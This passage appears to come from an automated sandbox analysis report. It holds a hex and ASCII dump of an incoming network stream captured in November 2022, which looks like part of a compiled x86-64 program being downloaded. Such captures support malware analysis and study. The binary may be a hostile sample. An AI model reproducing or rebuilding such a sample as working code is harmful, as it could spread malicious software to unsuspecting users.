24 38 48 8b 6c Data Ascii: D$DHD$(HD$PHl$0H8Bf;eH%(HH;aH0Hl$(Hl$(HD$WD$H@vHD$HD$HD$ HD$H$c1HL$H0MHT(HH=\|HEH$H_HD$HcL$HHD$HD$8Hl
2022-11-07 22:48:52 UTC	112	IN	Data Raw: 00 48 0f 44 c1 e9 37 fc ff ff 90 48 8d 05 6b d4 4c 00 48 89 04 24 c6 44 24 08 00 48 c7 44 24 10 00 00 00 00 e8 a4 dd 02 00 48 8b 6c 24 68 48 83 c4 70 c3 83 3d b3 c6 4c 00 00 0f 85 d3 fb ff ff 48 8b 44 24 78 48 85 c0 75 18 48 8b 0d 84 06 4d 00 48 39 0d 85 06 4d 00 0f 93 c1 89 c8 e9 b3 fb ff ff 48 83 f8 01 75 3c 83 3d 7a c6 4c 00 00 7d 07 31 c0 e9 9d fb ff ff 48 8b 0d 2e 06 4d 00 48 85 c9 74 1c 48 8b 94 24 80 00 00 00 48 29 ca 48 39 15 ff 79 45 00 0f 9c c1 89 c8 e9 75 fb ff ff 31 c9 eb f5 48 83 f8 02 75 1b 8b 0d 2d d4 4c 00 8b 94 24 88 00 00 00 29 ca 85 d2 0f 9f c1 89 c8 e9 50 fb ff ff b8 01 00 00 00 0f 1f 00 e9 43 fb ff ff e8 f6 8a 00 00 48 83 3c 24 ff 0f 95 c3 8b 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 48 8b 54 24 78 e9 df fa ff ff 83 3d ee c5 4c 00 00 Data Ascii: HD7HkLH$D$HD$Hl$hHp=LHD$xHuHMH9MHu<=zL}1H.MHtH$H)H9yEu1Hu-L$)PCH<$$H$HT$x=L
2022-11-07 22:48:52 UTC	128	IN	Data Raw: 00 00 48 83 bc 24 a0 01 00 00 00 66 90 0f 85 e5 00 00 00 48 8b ac 24 f8 01 00 00 48 81 c4 00 02 00 00 c3 48 8d 8c 24 80 00 00 00 48 89 0c 24 48 89 44 24 08 c6 44 24 10 00 e8 0f 41 00 00 e9 e9 fd ff ff 48 8d 48 50 48 89 0c 24 48 c7 44 24 08 08 00 00 00 48 8d 0d 95 38 45 00 48 89 4c 24 10 48 8b 8c 24 10 02 00 00 48 89 4c 24 18 48 8d 94 24 80 00 00 00 48 89 54 24 20 e8 2e 0d 00 00 48 8b 84 24 08 02 00 00 0f 57 c0 0f 1f 00 e9 96 fb ff ff 48 89 04 24 e8 32 ec 02 00 48 8b 84 24 08 02 00 00 e9 3c fb ff ff 8a 90 b9 00 00 00 84 d2 0f 94 c1 e9 1d fb ff ff 31 c9 e9 16 fb ff ff 83 f9 04 0f 86 da fa ff ff 0f 1f 44 00 00 83 f9 06 0f 85 0e 01 00 00 48 8b ac 24 f8 01 00 00 48 81 c4 00 02 00 00 c3 0f 1f 80 00 00 00 00 83 f9 02 0f 85 ee 00 00 00 eb 33 48 8d 05 1c 76 2c 00 Data Ascii: H$fH$HH$H$HD$D$AHHPH$HD$H8EHL$H$HL$H$HT$ .H$WH$2H$<1DH$H3Hv,
2022-11-07 22:48:52 UTC	144	IN	Data Raw: ff 48 8b 44 24 10 48 0f bd c8 48 c7 c2 ff ff ff ff 48 0f 44 ca 48 ff c1 48 8b 5c 24 18 48 29 cb 48 8d 4b 40 48 85 c0 74 95 48 8b 74 24 30 48 89 c8 e9 f8 fe ff ff 48 89 c1 eb ee 48 c7 44 24 70 00 00 00 00 48 c7 44 24 78 00 00 00 00 48 8b 6c 24 40 48 83 c4 48 c3 48 89 d8 e9 31 fe ff ff 48 8d 1c 13 48 8d 5b ff 48 89 d0 48 f7 da 48 21 da e9 a4 fd ff ff b9 08 00 00 00 e8 ee 62 04 00 48 89 d8 b9 08 00 00 00 e8 e1 62 04 00 90 e8 db 58 01 00 48 8d 05 8f f5 2b 00 48 89 04 24 48 c7 44 24 08 0f 00 00 00 e8 02 63 01 00 48 8b 44 24 60 48 89 04 24 e8 d4 5f 01 00 e8 8f 5b 01 00 e8 4a 59 01 00 48 8d 05 8a eb 2b 00 48 89 04 24 48 c7 44 24 08 0d 00 00 00 e8 91 40 01 00 e8 8c 58 01 00 48 8d 05 40 f5 2b 00 48 89 04 24 48 c7 44 24 08 0f 00 00 00 e8 b3 62 01 00 48 8b 44 24 60 Data Ascii: HD$HHHDHH\$H)HK@HtHt$0HHHD$pHD$xHl$@HHH1HH[HHH!bHbXH+H$HD$cHD$`H$_[JYH+H$HD$@XH@+H$HD$bHD$`
2022-11-07 22:48:52 UTC	160	IN	Data Raw: c1 e6 0d 48 01 de 41 09 c3 0f 1f 40 00 48 81 fe 00 00 40 00 76 12 b8 00 00 40 00 e9 2e ff ff ff 48 89 c1 e9 60 ff ff ff 48 89 f0 66 90 e9 1c ff ff ff 88 44 24 38 48 8b 6c 24 10 48 83 c4 18 c3 48 8d 05 62 7b 2c 00 48 89 04 24 48 c7 44 24 08 33 00 00 00 e8 14 01 01 00 4c 89 c0 b9 40 00 00 00 e8 27 23 04 00 90 e8 01 02 04 00 90 e9 9b fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 18 0f 86 f3 00 00 00 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 65 48 8b 14 25 28 00 00 00 48 8b 92 00 00 00 00 48 8b 52 30 48 8b 92 a0 00 00 00 48 85 d2 0f 84 8c 00 00 00 48 83 ba 28 12 00 00 00 75 51 48 89 54 24 18 31 c0 eb 37 48 89 44 24 10 48 8b 44 24 30 84 00 48 8d 88 b0 8c 01 00 Data Ascii: HA@H@v@.H`HfD$8Hl$HHb{,H$HD$3L@'#eH%(HH;aH(Hl$ Hl$ eH%(HHR0HHH(uQHT$17HD$HD$0H
2022-11-07 22:48:52 UTC	176	IN	Data Raw: 48 ff c3 48 c1 e3 16 48 01 f3 48 29 cb 48 89 5c 24 08 48 8b 8c 24 10 01 00 00 48 8d 94 24 10 01 00 00 ff d1 48 8b 84 24 30 01 00 00 48 89 04 24 48 8b 84 24 f8 00 00 00 48 89 44 24 08 e8 cb f3 ff ff 48 8b 44 24 10 48 8b 8c 24 a8 00 00 00 48 c1 e1 0d 48 8b 9c 24 e0 00 00 00 48 01 d9 48 bb 00 00 00 00 00 80 ff ff 48 01 d9 48 89 8c 24 40 01 00 00 48 89 84 24 48 01 00 00 48 8b ac 24 20 01 00 00 48 81 c4 28 01 00 00 c3 48 8b 94 24 30 01 00 00 48 8b 4a 68 48 8b 52 60 48 8b 84 24 f0 00 00 00 48 39 c1 0f 86 a9 01 00 00 48 8b 0c c2 48 89 ca 48 81 e1 ff ff 1f 00 48 bb 00 00 00 00 00 00 00 80 48 85 d3 bb 00 00 20 00 48 0f 45 cb 48 0f ba e2 3f 73 18 bb 00 00 20 00 48 89 5c 24 48 48 89 4c 24 28 73 1c ba 00 00 20 00 eb 20 48 89 d3 48 c1 eb 15 48 81 e3 ff ff 1f 00 48 0f Data Ascii: HHHH)H\$H$H$H$0H$H$HD$HD$H$HH$HHHH$@H$HH$ H(H$0HJhHR`H$H9HHHHH HEH?s H\$HHL$(s HHHH
2022-11-07 22:48:52 UTC	192	IN	Data Raw: ca 48 89 d3 48 c1 e2 04 48 8b 74 11 08 48 8b 3c 11 49 b8 00 00 00 00 00 80 00 00 4d 8d 0c 38 49 01 f0 4d 39 c1 73 3f 90 49 89 f0 48 29 fe 4c 8b 4c 24 10 49 39 f1 73 1b 90 4c 89 c3 4d 29 c8 4c 89 44 11 08 4c 29 48 18 4c 89 44 24 18 48 89 5c 24 20 c3 48 89 58 08 48 29 70 18 48 89 7c 24 18 4c 89 44 24 20 c3 49 89 f0 31 f6 66 90 eb bf 0f 57 c0 0f 11 44 24 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 31 02 00 00 48 83 ec 60 48 89 6c 24 58 48 8d 6c 24 58 48 8b 44 24 68 48 89 04 24 48 8b 4c 24 70 48 89 4c 24 08 0f 1f 44 00 00 e8 bb f8 ff ff 48 8b 44 24 10 48 85 c0 0f 84 be 01 00 00 48 8b 5c 24 68 48 8b 33 48 8b 4b 08 48 8b 7b 10 48 39 c8 0f 87 d9 01 00 00 48 29 c1 49 89 c0 Data Ascii: HHHtH<IM8IM9s?IH)LL$I9sLM)LDL)HLD$H\$ HXH)pH\|$LD$ I1fWD$eH%(HH;a1H`Hl$XHl$XHD$hH$HL$pHL$DHD$HH\$hH3HKH{H9H)I
2022-11-07 22:48:52 UTC	208	IN	Data Raw: ff cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 7e 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 8b 4c 24 60 85 c9 74 55 c7 44 24 3c 00 00 00 00 48 85 c9 76 52 48 8b 05 47 f7 43 00 48 8b 54 24 58 48 89 04 24 48 8b 44 24 50 48 89 44 24 08 48 89 54 24 10 89 c8 48 89 44 24 18 48 8d 44 24 3c 48 89 44 24 20 48 c7 44 24 28 00 00 00 00 e8 68 0b 00 00 48 8b 6c 24 40 48 83 c4 48 c3 48 8b 6c 24 40 48 83 c4 48 c3 31 c0 e8 cd 62 03 00 90 e8 c7 41 03 00 e9 62 ff ff ff cc cc 48 83 ec 60 48 89 6c 24 58 48 8d 6c 24 58 48 8b 44 24 68 48 85 c0 0f 8d ee 00 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 0d c1 f6 43 00 48 8b 80 18 03 00 00 48 89 0c 24 48 89 44 24 08 b8 ff ff ff ff 48 89 44 24 10 e8 Data Ascii: eH%(HH;av~HHHl$@Hl$@HL$`tUD$<HvRHGCHT$XH$HD$PHD$HT$HD$HD$<HD$ HD$(hHl$@HHHl$@HH1bAbH`Hl$XHl$XHD$hHeH%(HH@0HCHH$HD$HD$
2022-11-07 22:48:52 UTC	224	IN	Data Raw: 8d 05 f1 8e 2a 00 48 89 04 24 48 c7 44 24 08 07 00 00 00 e8 95 23 00 00 e8 f0 19 00 00 48 8b 84 24 c8 00 00 00 48 89 04 24 48 8b 84 24 d0 00 00 00 48 89 44 24 08 e8 32 01 fd ff e8 2d 19 00 00 e8 08 1c 00 00 e8 c3 19 00 00 48 8d 05 da cd 2a 00 48 89 04 24 48 c7 44 24 08 13 00 00 00 e8 0a 01 00 00 e8 05 19 00 00 48 8d 05 88 8e 2a 00 48 89 04 24 48 c7 44 24 08 07 00 00 00 e8 2c 23 00 00 e8 87 19 00 00 48 8b 84 24 c8 00 00 00 48 89 04 24 48 8b 84 24 d0 00 00 00 48 89 44 24 08 e8 c9 00 fd ff e8 c4 18 00 00 0f 1f 40 00 e8 9b 1b 00 00 e8 56 19 00 00 48 8d 05 7b da 2a 00 48 89 04 24 48 c7 44 24 08 15 00 00 00 66 90 e8 9b 00 00 00 90 e8 95 01 03 00 e9 90 f7 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 44 24 08 48 89 44 24 10 c3 cc cc cc cc cc cc cc Data Ascii: H$HD$#H$H$H$HD$2-HH$HD$HH$HD$,#H$H$H$HD$@VH{H$HD$fHD$HD$
2022-11-07 22:48:52 UTC	240	IN	Data Raw: 00 00 90 48 8b 44 24 50 8b 88 90 00 00 00 65 48 8b 14 25 28 00 00 00 48 8b 92 00 00 00 00 48 8b 5a 30 90 ff 83 d8 00 00 00 0f ba f1 0c 48 8b 5a 30 83 f9 04 0f 85 bd 00 00 00 48 89 54 24 38 48 89 5c 24 28 48 89 04 24 48 b9 04 00 00 00 01 00 00 00 48 89 4c 24 08 e8 91 08 00 00 48 8b 44 24 38 48 8b 40 30 48 8b 80 a0 00 00 00 48 89 04 24 48 8b 44 24 50 48 89 44 24 08 0f b6 44 24 60 88 44 24 10 e8 65 aa 00 00 0f 1f 44 00 00 e8 9b 30 00 00 90 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 4c 24 28 8b 91 d8 00 00 00 8d 5a ff 89 99 d8 00 00 00 83 fa 01 75 11 80 b8 b1 00 00 00 00 74 08 48 c7 40 10 de fa ff ff 48 8b 6c 24 40 48 83 c4 48 c3 48 8b 44 24 50 48 89 04 24 48 8b 4c 24 58 48 89 4c 24 08 0f 1f 00 e8 9b b9 01 00 e9 0b ff ff ff 90 65 48 8b 0c 25 28 00 Data Ascii: HD$PeH%(HHZ0HZ0HT$8H\$(H$HHL$HD$8H@0HH$HD$PHD$D$`D$eD0eH%(HHL$(ZutH@Hl$@HHHD$PH$HL$XHL$eH%(
2022-11-07 22:48:52 UTC	256	IN	Data Raw: e8 c8 ba 02 00 48 8b 04 24 48 8d 0d 65 5f 47 00 48 87 01 48 83 3d aa 87 4a 00 00 74 0c 48 83 7c 24 50 00 0f 84 d0 02 00 00 90 90 48 8d 05 53 5f 47 00 48 89 04 24 e8 32 b6 fc ff 90 48 8b 05 7a 5f 47 00 48 89 84 24 d0 00 00 00 66 90 48 85 c0 74 1b 48 8b 48 08 48 89 0d 60 5f 47 00 b9 ff ff ff ff 48 8d 15 5c 5f 47 00 f0 0f c1 0a 90 90 48 8d 05 0f 5f 47 00 48 89 04 24 e8 4e b8 fc ff 48 8b 84 24 d0 00 00 00 66 0f 1f 44 00 00 48 85 c0 0f 84 43 02 00 00 48 89 04 24 e8 2e 48 00 00 48 8b 44 24 50 66 0f 1f 84 00 00 00 00 00 48 85 c0 0f 85 89 01 00 00 0f b6 44 24 2e 84 c0 0f 84 6f 01 00 00 48 8b 84 24 c8 00 00 00 48 8b 48 30 c6 81 e4 00 00 00 01 b9 01 00 00 00 48 8d 15 e7 5e 47 00 f0 0f c1 0a 48 8b 48 30 48 8b 89 a0 00 00 00 83 3d 75 5f 47 00 00 74 0f e8 8e f4 ff ff Data Ascii: H$He_GHH=JtH\|$PHS_GH$2Hz_GH$fHtHHH`_GH\_GH_GH$NH$fDHCH$.HHD$PfHD$.oH$HH0H^GHH0H=u_Gt
2022-11-07 22:48:52 UTC	272	IN	Data Raw: 00 75 0f 48 89 5c ca 68 0f 1f 44 00 00 e9 74 ff ff ff e8 f6 5f 02 00 e9 6a ff ff ff 0f 57 c0 0f 11 44 24 48 48 8d 0d 02 ea 01 00 48 89 4c 24 48 48 89 44 24 50 48 8d 4c 24 48 48 89 0c 24 e8 ca 40 02 00 48 8b 44 24 68 48 8b 48 40 48 89 0c 24 e8 d8 40 fd ff 48 8b 44 24 68 48 c7 40 40 00 00 00 00 48 89 04 24 e8 42 f9 ff ff 48 8b 44 24 68 48 89 04 24 e8 b4 23 01 00 48 8b 44 24 68 48 c7 80 70 16 00 00 00 00 00 00 c7 40 04 04 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 48 8d b8 10 0e 00 00 e8 27 5f 02 00 e9 d7 fe ff ff 48 89 04 24 e8 19 cf fe ff 48 8b 44 24 68 48 8d 88 98 16 00 00 48 89 0c 24 e8 64 25 fe ff 48 8b 44 24 68 e9 60 fe ff ff 48 89 4c 24 40 48 89 0c 24 48 b8 04 00 00 00 01 00 00 00 48 89 44 24 08 66 90 e8 fb 87 ff ff 80 3d 84 b6 47 00 00 75 56 90 90 48 8b Data Ascii: uH\hDt_jWD$HHHL$HHD$PHL$HH$@HD$hHH@H$@HD$hH@@H$BHD$hH$#HD$hHp@Hl$XH`H'_H$HD$hHH$d%HD$h`HL$@H$HHD$f=GuVH
2022-11-07 22:48:52 UTC	288	IN	Data Raw: 7f 19 48 8b 44 24 18 48 85 c0 74 06 c7 00 00 00 00 00 c7 44 24 20 ff ff ff 7f c3 48 8b 44 24 18 48 85 c0 74 02 89 10 89 5c 24 20 c3 cc 48 8b 44 24 08 48 89 44 24 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 cc 00 00 00 48 83 ec 30 48 89 6c 24 28 48 8d 6c 24 28 48 8b 44 24 50 48 85 c0 b9 00 00 00 00 48 0f 4c c1 eb 1f 88 04 1a 48 ff c6 48 ff c3 48 c1 e8 08 48 83 fe 08 7d 09 48 39 d9 7e 04 77 e6 eb 7b 48 89 d8 48 8b 4c 24 40 90 48 39 c8 7d 63 48 89 44 24 20 e8 11 3a 02 00 48 8b 44 24 20 48 83 f8 10 b9 10 00 00 00 48 89 c2 48 0f 4f c1 48 29 c2 48 8b 34 24 48 8b 7c 24 40 48 39 fa 73 45 48 8b 4c 24 38 48 01 ca 48 89 14 24 48 89 74 24 08 48 89 44 24 10 e8 30 1c 02 00 48 8b Data Ascii: HD$HtD$ HD$Ht\$ HD$HD$eH%(HH;aH0Hl$(Hl$(HD$PHHLHHHH}H9~w{HHL$@H9}cHD$ :HD$ HHHOH)H4$H\|$@H9sEHL$8HH$Ht$HD$0H
2022-11-07 22:48:52 UTC	304	IN	Data Raw: 42 0f b6 04 00 0f 1f 84 00 00 00 00 00 48 83 f8 43 0f 83 a8 00 00 00 4c 8d 15 af d3 42 00 45 0f b7 04 42 e9 7b ff ff ff 4c 8d 80 00 20 00 00 4c 39 c0 76 08 49 89 c0 e9 67 ff ff ff 90 4c 8d 80 ff 1f 00 00 49 81 e0 00 e0 ff ff 66 90 e9 51 ff ff ff 48 89 d0 48 89 da e9 90 fa ff ff 48 89 d0 4c 89 c2 e9 85 fa ff ff 48 89 d0 4c 8b 4c 24 78 e9 78 fa ff ff 48 8d 05 51 c8 49 00 48 89 84 24 90 00 00 00 48 8b 44 24 78 48 89 84 24 98 00 00 00 48 89 94 24 a0 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 48 8d 05 83 e2 24 00 48 89 04 24 48 8d 05 c8 8a 2e 00 48 89 44 24 08 e8 ae b7 fe ff b9 43 00 00 00 e8 a4 e2 01 00 b9 f9 00 00 00 e8 ba e2 01 00 b9 43 00 00 00 e8 90 e2 01 00 b9 81 00 00 00 e8 a6 e2 01 00 48 89 d0 b9 43 00 00 00 e8 79 e2 01 00 48 89 d0 b9 f9 00 00 00 e8 8c e2 Data Ascii: BHCLBEB{L L9vIgLIfQHHHLHLL$xxHQIH$HD$xH$H$Hl$XH`H$H$H.HD$CCHCyH
2022-11-07 22:48:52 UTC	320	IN	Data Raw: 18 48 8b 54 24 58 e9 7a ff ff ff 48 8b 4c 24 58 eb d3 e8 56 82 01 00 e9 11 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 86 01 00 00 48 83 ec 50 48 89 6c 24 48 48 8d 6c 24 48 48 8b 5c 24 60 48 8b 74 24 68 31 c0 31 c9 eb 08 48 ff c1 4c 89 c0 66 90 48 39 f0 7d 42 44 0f b6 04 03 41 81 f8 80 00 00 00 7d 06 4c 8d 40 01 eb df 48 89 4c 24 30 48 89 1c 24 48 89 74 24 08 48 89 44 24 10 e8 8f e6 00 00 4c 8b 44 24 20 48 8b 4c 24 30 48 8b 5c 24 60 48 8b 74 24 68 eb b1 48 8b 7c 24 58 48 85 ff 0f 84 ce 00 00 00 48 83 f9 20 0f 8f c4 00 00 00 0f 57 c0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 19 a5 01 00 48 8b 6d 00 0f 87 d7 00 00 00 48 8b 44 24 58 ba 20 00 00 00 48 89 44 24 40 48 89 54 24 38 48 89 4c Data Ascii: HT$XzHL$XVeH%(HH;aHPHl$HHl$HH\$`Ht$h11HLfH9}BDA}L@HL$0H$Ht$HD$LD$ HL$0H\$`Ht$hH\|$XHH WHl$Hl$HmHD$X HD$@HT$8HL
2022-11-07 22:48:52 UTC	336	IN	Data Raw: 84 75 ff ff ff 48 c7 42 10 de fa ff ff e9 68 ff ff ff 48 8b 11 89 f0 bf 03 00 00 00 f0 0f b1 79 40 0f 94 c1 84 c9 74 59 90 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 8b 8b d8 00 00 00 8d 71 ff 89 b3 d8 00 00 00 0f 1f 44 00 00 83 f9 01 75 11 80 b8 b1 00 00 00 00 74 08 48 c7 40 10 de fa ff ff 84 02 b8 01 00 00 00 f0 0f c1 82 90 27 00 00 c6 44 24 40 01 48 8b 6c 24 28 48 83 c4 30 c3 48 89 5c 24 18 48 89 54 24 20 66 90 e8 9b 21 00 00 48 8b 54 24 20 48 8b 5c 24 18 eb 8a c6 44 24 40 00 48 8b 6c 24 28 48 83 c4 30 90 c3 83 fa 02 75 27 48 8b 05 83 ff 45 00 48 89 04 24 c7 44 24 08 00 00 00 00 e8 22 79 01 00 48 8b 4c 24 38 be 06 00 00 00 e9 a0 fe ff ff c6 44 24 40 00 48 8b 6c 24 28 48 83 c4 30 c3 0f 1f 40 00 83 fa 07 0f 87 3c 01 00 00 83 fa 06 0f 84 0a 01 00 00 Data Ascii: uHBhHy@tYeH%(HqDutH@'D$@Hl$(H0H\$HT$ f!HT$ H\$D$@Hl$(H0u'HEH$D$"yHL$8D$@Hl$(H0@<
2022-11-07 22:48:52 UTC	352	IN	Data Raw: 85 c9 75 6a 48 c7 44 24 60 00 00 00 00 0f 11 44 24 50 0f 11 84 24 90 00 00 00 48 c7 84 24 a0 00 00 00 00 00 00 00 48 8b 44 24 60 48 89 44 24 68 48 8d 44 24 50 48 89 04 24 48 8b 84 24 c8 00 00 00 48 89 44 24 08 48 8b 94 24 c0 00 00 00 48 8b 0a ff d1 80 7c 24 10 00 0f 85 7b ff ff ff 48 8b ac 24 a8 00 00 00 48 81 c4 b0 00 00 00 c3 48 89 4c 24 40 48 8b 01 48 89 44 24 60 48 89 04 24 e8 a9 a6 ff ff 48 8b 44 24 10 48 8b 4c 24 08 48 85 c9 0f 84 b5 00 00 00 48 89 4c 24 50 48 89 44 24 58 48 8b 5c 24 48 83 3b 00 0f 1f 40 00 0f 85 7f 00 00 00 31 d2 48 89 94 24 90 00 00 00 8b 71 0c 48 63 fe 48 89 bc 24 98 00 00 00 48 c7 84 24 a0 00 00 00 00 00 00 00 81 fe 00 00 00 80 0f 85 43 ff ff ff 48 8d 54 24 50 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 c6 44 24 18 01 48 8b 44 24 Data Ascii: ujHD$`D$P$H$HD$`HD$hHD$PH$H$HD$H$H\|${H$HHL$@HHD$`H$HD$HL$HHL$PHD$XH\$H;@1H$qHcH$H$CHT$PH$HL$HD$D$HD$
2022-11-07 22:48:52 UTC	368	IN	Data Raw: 00 48 8b 0d e5 7f 45 00 48 89 0c 24 48 8b 4c 24 28 48 89 4c 24 08 48 8b 08 48 89 c2 ff d1 48 8b 6c 24 18 48 83 c4 20 c3 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 48 30 48 39 81 90 00 00 00 75 b5 48 8d 05 11 cb 29 00 90 eb b2 e8 19 c2 00 00 e9 74 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 bb 00 00 00 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 83 3d 58 7f 45 00 00 0f 84 8d 00 00 00 83 3d 5f c6 48 00 00 76 5e 48 8d 05 4a ca 29 00 48 8b 4c 24 58 48 85 c9 76 7d 0f 57 c0 0f 11 44 24 18 0f 11 44 24 28 48 8b 5c 24 48 48 89 5c 24 18 48 8b 5c 24 50 48 89 5c 24 28 48 89 4c 24 30 48 8b 0d 0b 7f 45 00 48 89 0c 24 48 8d 4c 24 18 48 89 4c 24 08 48 8b 08 48 89 c2 ff Data Ascii: HEH$HL$(HL$HHHl$H eH%(HHH0H9uH)teH%(HH;aH@Hl$8Hl$8H=XE=_Hv^HJ)HL$XHv}WD$D$(H\$HH\$H\$PH\$(HL$0HEH$HL$HL$HH
2022-11-07 22:48:52 UTC	384	IN	Data Raw: 74 08 48 c7 43 10 de fa ff ff 48 8b 51 08 48 85 d2 74 21 90 90 31 db 48 89 59 08 84 02 48 8b 4c 24 08 31 c0 f0 48 0f b1 8a 80 16 00 00 0f 94 c1 84 c9 74 06 c6 44 24 18 01 c3 c6 44 24 18 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 92 01 00 00 48 83 ec 38 48 89 6c 24 30 48 8d 6c 24 30 48 8b 42 10 48 89 44 24 20 48 8b 4a 08 48 89 4c 24 18 48 89 0c 24 48 ba 02 00 00 00 04 00 00 00 48 89 54 24 08 e8 4e c8 fd ff 48 8b 44 24 20 84 00 48 8b 88 88 16 00 00 48 85 c9 0f 85 e9 00 00 00 48 8d 88 98 16 00 00 48 89 4c 24 28 48 89 0c 24 48 c7 44 24 08 03 00 00 00 e8 b9 05 fc ff 48 8b 44 24 18 80 b8 b1 00 00 00 00 74 7f 90 48 8d 05 9b 5e 45 00 48 89 04 24 e8 7a b5 fa ff eb 0e 90 48 89 15 d8 5e 45 00 ff 05 Data Ascii: tHCHQHt!1HYHL$1HtD$D$eH%(HH;aH8Hl$0Hl$0HBHD$ HJHL$H$HHT$NHD$ HHHHL$(H$HD$HD$tH^EH$zH^E
2022-11-07 22:48:52 UTC	400	IN	Data Raw: 48 83 78 78 00 0f 8e ec 03 00 00 0f 57 c0 0f 11 84 24 b0 00 00 00 48 8b 0d 00 00 45 00 48 89 8c 24 b0 00 00 00 48 8d 88 e0 00 00 00 48 89 8c 24 b8 00 00 00 48 8d 48 30 48 8b 50 78 48 8b 58 20 48 89 0c 24 48 89 54 24 08 48 c7 44 24 10 00 00 00 00 4c 89 4c 24 18 48 8b 8c 24 b8 00 00 00 48 8b 94 24 b0 00 00 00 48 89 54 24 20 48 89 4c 24 28 48 89 5c 24 30 e8 d2 05 ff ff 48 8b 84 24 d0 00 00 00 48 8d b8 a8 00 00 00 48 83 b8 a8 00 00 00 00 0f 84 5a 02 00 00 48 8b 4c 24 48 48 39 88 d8 00 00 00 0f 84 2e 02 00 00 48 89 7c 24 78 48 ff 80 80 00 00 00 48 83 b8 d8 00 00 00 00 7e 15 0f b6 4c 24 47 0f 1f 84 00 00 00 00 00 84 c9 0f 84 76 01 00 00 48 8d 88 90 00 00 00 48 89 0c 24 e8 68 fe fe ff 83 3d 51 49 48 00 00 90 0f 85 3f 01 00 00 48 8b 84 24 d0 00 00 00 48 c7 80 a8 Data Ascii: HxxW$HEH$HH$HH0HPxHX H$HT$HD$LL$H$H$HT$ HL$(H\$0H$HHZHL$HH9.H\|$xHH~L$GvHH$h=QIH?H$H
2022-11-07 22:48:52 UTC	416	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8b 5c 24 20 48 8b 53 10 48 8b 0a 65 48 8b 0c 25 28 00 00 00 48 89 91 00 00 00 00 48 8b 23 48 8b 43 20 48 8b 53 18 48 8b 6b 30 48 c7 03 00 00 00 00 48 c7 43 20 00 00 00 00 48 c7 43 18 00 00 00 00 48 c7 43 30 00 00 00 00 48 8b 5b 08 ff e3 cc cc 48 8b 7c 24 08 65 48 8b 0c 25 28 00 00 00 48 8b 81 00 00 00 00 48 8b 1c 24 48 89 58 40 48 8d 5c 24 08 48 89 58 38 48 89 40 48 48 89 68 68 48 8b 99 00 00 00 00 48 8b 5b 30 48 8b 33 48 39 c6 75 09 48 8d 05 18 35 fd ff ff e0 48 89 b1 00 00 00 00 48 8b 66 38 50 48 89 fa 48 8b 3f ff d7 58 48 8d 05 5a 35 fd ff ff e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: HHl$Hl$H\$ HSHeH%(HH#HC HSHk0HHC HCHC0H[H\|$eH%(HH$HX@H\$HX8H@HHhhHH[0H3H9uH5HHf8PHH?XHZ5
2022-11-07 22:48:52 UTC	432	IN	Data Raw: 10 76 42 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8b 44 24 30 48 89 04 24 48 8b 44 24 38 48 89 44 24 08 48 c7 44 24 10 14 10 00 00 e8 9b 62 f9 ff 0f b6 44 24 18 88 44 24 40 48 8b 6c 24 20 48 83 c4 28 c3 e8 23 c2 ff ff eb a1 cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 42 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8b 44 24 30 48 89 04 24 48 8b 44 24 38 48 89 44 24 08 48 c7 44 24 10 24 00 00 00 e8 3b 62 f9 ff 0f b6 44 24 18 88 44 24 40 48 8b 6c 24 20 48 83 c4 28 c3 e8 c3 c1 ff ff eb a1 cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8b 59 20 48 85 db 75 7f 48 8b 54 24 20 48 85 d2 74 6f 48 8b 02 48 85 c0 75 27 b8 07 00 00 00 48 8d 0d 41 4d 27 00 48 89 4c 24 28 48 89 44 24 30 48 8b 6c Data Ascii: vBH(Hl$ Hl$ HD$0H$HD$8HD$HD$bD$D$@Hl$ H(#eH%(HH;avBH(Hl$ Hl$ HD$0H$HD$8HD$HD$$;bD$D$@Hl$ H(eH%(HHHl$Hl$HY HuHT$ HtoHHu'HAM'HL$(HD$0Hl
